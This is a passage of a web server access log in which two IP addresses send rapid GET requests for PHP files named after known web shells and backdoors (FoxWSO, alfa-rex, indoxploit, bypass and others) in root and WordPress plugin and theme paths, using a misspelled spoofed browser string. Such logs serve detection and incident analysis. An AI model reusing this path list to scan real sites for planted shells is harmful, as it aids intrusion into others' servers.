AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:52 -0400] "GET /anjay.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:55 -0400] "GET /anon.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:59 -0400] "GET /anons79.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:03 -0400] "GET /base.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:09 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:14 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:17 -0400] "GET /batm.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:21 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:21 -0400] "GET /bj.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:23 -0400] "GET /admin.php?520 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:24 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:27 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:31 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:34 -0400] "GET /black.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:40 -0400] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:43 -0400] "GET /blog/wp-includes/fonts/dev.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:48 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:50 -0400] "GET /blog/wp-includes/fonts/iqb.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:53 -0400] "GET /by.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:55 -0400] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:20:56 -0400] "GET /byp.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:20:59 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:03 -0400] "GET /bypas.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:03 -0400] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:09 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:12 -0400] "GET /bypass.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:14 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:14 -0400] "GET /byps.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:18 -0400] "GET /c.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:21 -0400] "GET /ccaef.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:23 -0400] "GET /chitoge.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:26 -0400] "GET /codeboy1877x.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:27 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:28 -0400] "GET /con.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:31 -0400] "GET /con7.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:32 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:34 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:37 -0400] "GET /con7ext.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:41 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:43 -0400] "GET /dbx.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:44 -0400] "GET /wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:46 -0400] "GET /defau1t.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:46 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:51 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:53 -0400] "GET /degeselih.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:55 -0400] "GET /chosen.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:55 -0400] "GET /dev.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:21:56 -0400] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:58 -0400] "GET /docindex.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:21:59 -0400] "GET /dosya.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:00 -0400] "GET /Dz.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:22:05 -0400] "GET /xl2023.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:06 -0400] "GET /e.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:22:08 -0400] "GET /wp-pano.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:09 -0400] "GET /error.php?phpshells HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:22:11 -0400] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:13 -0400] "GET /evil.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:16 -0400] "GET /file.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:28 -0400] "GET /fox.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:35 -0400] "GET /FoxWSO-full.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:39 -0400] "GET /FoxWSO.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:44 -0400] "GET /foxwso.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:22:46 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:49 -0400] "GET /gank.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:58 -0400] "GET /gank.php.PhP HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:22:58 -0400] "GET /themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:22:58 -0400] "GET /gel4y.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:04 -0400] "GET /gelay.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:07 -0400] "GET /gh.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:15 -0400] "GET /hehe.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:17 -0400] "GET /i.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:20 -0400] "GET /id.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:21 -0400] "GET /ids.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:27 -0400] "GET /idx.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:29 -0400] "GET /indoxploit.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:34 -0400] "GET /init.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:38 -0400] "GET /ioxi.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:40 -0400] "GET /iq.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:40 -0400] "GET /iqb.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:41 -0400] "GET /k.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:44 -0400] "GET /kepo.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:49 -0400] "GET /kk.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:54 -0400] "GET /kndw1.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:56 -0400] "GET /la.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:23:58 -0400] "GET /lnedx.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:04 -0400] "GET /lol.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:09 -0400] "GET /lolzk.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:14 -0400] "GET /m.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:15 -0400] "GET /mar.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:20 -0400] "GET /marijuana.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:22 -0400] "GET /mas.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:27 -0400] "GET /mass.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:24:32 -0400] "GET /mclash.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 